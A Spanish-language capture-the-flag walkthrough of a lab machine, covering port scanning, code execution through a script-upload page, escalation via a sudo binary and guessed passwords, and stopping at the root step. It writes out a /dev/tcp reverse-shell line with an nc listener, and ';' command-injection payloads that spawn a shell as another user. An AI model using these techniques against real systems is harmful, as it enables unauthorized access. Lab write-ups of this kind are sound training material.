Por lo que cuando terminemos de hackearla, le damos a Ctrl+C y nos eliminara la maquina para que no se queden archivos basura.
Escaneo de puertos
nmap-p---open-sS--min-rate5000-vvv-n-Pn<IP>
nmap-sCV-p<PORTS><IP>
Info:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-29 07:51 EDT
Nmap scan report for 172.20.0.2
Host is up (0.000031s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.58 ((Ubuntu))
|_http-server-header: Apache/2.4.58 (Ubuntu)
|_http-title: Security Verification Tool
7777/tcp open http SimpleHTTPServer 0.6 (Python 3.12.3)
|_http-title: Directory listing for /
|_http-server-header: SimpleHTTP/0.6 Python/3.12.3
MAC Address: 02:42:AC:14:00:02 (Unknown)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.48 seconds
Vemos que hay una pagina web y despues un servidor de python3 abierto en el puerto 7777, si vamos al servidor de python3 veremos muchos archivos pero entre ellos una carpeta llamada secret que si entramos en ella, veremos un archivo llamado history.txt y contiene lo siguiente.
Vemos que se repite varias veces la palabra super_secure_password y si nos vamos a la pagina web del puerto 80 vemos que tenemos que meter una palabra, por lo que probaremos con esa.
Si la metemos veremos que es la correcta y nos redirigira a otra pagina web en la que podemos crear una configuracion del sistema y despues mas abajo como ejecutarla por asi decirlo.
Segunda pagina de configuracion
Si probamos a poner como nombre en la seccion Configuration Identifier por ejemplo test1.sh
Y en su contenido le metemos:
#!/bin/bashecho'Probando test1.sh'
Le daremos al boton de Apply Configuration y veremos que se nos creo un archivo con ese contenido, por que si nos vamos al servidor de python3 veremos que el archivo esta ahi subido y con el contenido que le metimos, ahora si vamos a ejecutar esa "configuracion" en la opcion de abajo llamada Execute Remote Configuration ponemos el nombre del archivo test1.sh y le damos al boton Fetch Configuration, por lo que vemos que nos ejecuto correctamente e interpreta codigo bash, por lo que haremos lo siguiente.
Reverse Shell
Crearemos un archivo de la misma forma llamado shell.sh y con el siguiente contenido:
#!/bin/bashsh-i>&/dev/tcp/<IP>/<PORT>0>&1
Info:
Configuración 'shell.sh' aplicada con éxito.
Le damos al boton de Apply Configuration y ahora veremos que se creo correctamente, por lo que seguidamente antes de ejecutarlo en la opcion de abajo estaremos a la escucha.
nc-lvnp<PORT>
Y nos vamos a la pagina web, en la opcion de Execute Remote Configuration ponemos el nombre del archivo en mi caso shell.sh y le damos al boton Fetch Configuration, ahora si nos vamos a donde teniamos la escucha veremos que se nos creo una shell con el usuario www-data.
Info:
connect to [192.168.5.145] from (UNKNOWN) [172.20.0.2] 54068
sh: 0: can't access tty; job control turned off
$
Ahora sanitizaremos la shell (TTY):
script/dev/null-cbash
# <Ctrl> + <z>sttyraw-echo; fgresetxtermexport TERM=xtermexport SHELL=/bin/bash# Para ver las dimensiones de nuestra consola en el Hoststtysize# Para redimensionar la consola ajustando los parametros adecuadossttyrows<ROWS>columns<COLUMNS>
Escalate user codebad
Si nos vamos a la /home del usuario codebad veremos los siguiente.
total 44
drwxr-xr-x 3 codebad codebad 4096 Aug 29 13:22 .
drwxr-xr-x 1 root root 4096 Aug 29 11:41 ..
-rw------- 1 codebad codebad 5 Aug 29 13:22 .bash_history
-rw-r--r-- 1 codebad codebad 220 Aug 29 11:39 .bash_logout
-rw-r--r-- 1 codebad codebad 3771 Aug 29 11:39 .bashrc
-rw-r--r-- 1 codebad codebad 807 Aug 29 11:39 .profile
-rwxr-xr-x 1 metadata metadata 16176 Aug 29 12:16 code
drwxr-xr-x 2 root root 4096 Aug 29 11:49 secret
Si nos metemos en la carpeta secret/ veremos un archivo llamado adivina.txt que dice lo siguiente.
Adivinanza
En el mundo digital, donde la protección es vital,
existe algo peligroso que debes evitar.
No es un virus común ni un simple error,
sino algo más sutil que trabaja con ardor.
Es el arte de lo malo, en el software es su reino,
se oculta y se disfraza, su propósito es el mismo.
No es virus, ni gusano, pero se comporta igual,
toma su nombre de algo que no es nada normal.
¿Qué soy?
La respuesta a esta adivinanza es la palabra malware por lo que posiblemente sea la contraseña del usuario codebad.
sucodebad
Y si metemos como contraseña la palabra malware veremos que es su contraseña y ya seremos dicho usuario.
Escalate user metadata
Si hacemos sudo -l veremos lo siguiente.
Matching Defaults entries for codebad on a6c7dc66c5c1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User codebad may run the following commands on a6c7dc66c5c1:
(metadata : metadata) NOPASSWD: /home/codebad/code
Vemos que podemos ejecutar como metadata el binario code, por lo que haremos lo siguiente.
sudo-umetadata/home/codebad/code
Info:
Usage: /home/codebad/code <options>
Vemos que necesita un input por lo que le pondremos algo.
sudo-umetadata/home/codebad/code'hola'
Info:
/bin/ls: cannot access 'hola': No such file or directory
Vemos que por detras se esta ejecutando un ls, probaremos a poner -la.
sudo-umetadata/home/codebad/code'-la'
Info:
total 44
drwxr-xr-x 3 codebad codebad 4096 Aug 29 13:22 .
drwxr-xr-x 1 root root 4096 Aug 29 11:41 ..
-rw------- 1 codebad codebad 5 Aug 29 13:22 .bash_history
-rw-r--r-- 1 codebad codebad 220 Aug 29 11:39 .bash_logout
-rw-r--r-- 1 codebad codebad 3771 Aug 29 11:39 .bashrc
-rw-r--r-- 1 codebad codebad 807 Aug 29 11:39 .profile
-rwxr-xr-x 1 metadata metadata 16176 Aug 29 12:16 code
drwxr-xr-x 2 root root 4096 Aug 29 11:49 secret
Vemos que funciona, por lo que intentaremos concatenar comandos a ver si funciona.
sudo-umetadata/home/codebad/code'-la; whoami'
Info:
total 44
drwxr-xr-x 3 codebad codebad 4096 Aug 29 13:22 .
drwxr-xr-x 1 root root 4096 Aug 29 11:41 ..
-rw------- 1 codebad codebad 5 Aug 29 13:22 .bash_history
-rw-r--r-- 1 codebad codebad 220 Aug 29 11:39 .bash_logout
-rw-r--r-- 1 codebad codebad 3771 Aug 29 11:39 .bashrc
-rw-r--r-- 1 codebad codebad 807 Aug 29 11:39 .profile
-rwxr-xr-x 1 metadata metadata 16176 Aug 29 12:16 code
drwxr-xr-x 2 root root 4096 Aug 29 11:49 secret
metadata
Vemos que funciona por lo que obtendremos una shell del usuario metadata de la siguiente forma.
sudo-umetadata/home/codebad/code'-la; bash -i'
Y si ahora hacemos whoami.
metadata
Veremos que somos el usuario metadata por lo que leeremos la flag.
user.txt
f5d22841e337cab01739e59cce3275e9
Escalate Privileges
Si hacemos sudo -l veremos que necesitaremos una contraseña, por lo que buscaremos a ver donde puede haber alguna pista.
Si vamos a /usr/local/bin veremos un binario llamado metadatosmalos con un contenido que no importa mucho y los permisos normales, por lo que probaremos a meter como contraseña el nombre del binario.
sudo-l
Metemos como contraseña metadatosmalos y veremos que funciona.
Matching Defaults entries for metadata on a6c7dc66c5c1:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty
User metadata may run the following commands on a6c7dc66c5c1:
(ALL : ALL) /usr/bin/c89
Vemos que podemos ejecutar como root el binario c89 por lo que haremos lo siguiente.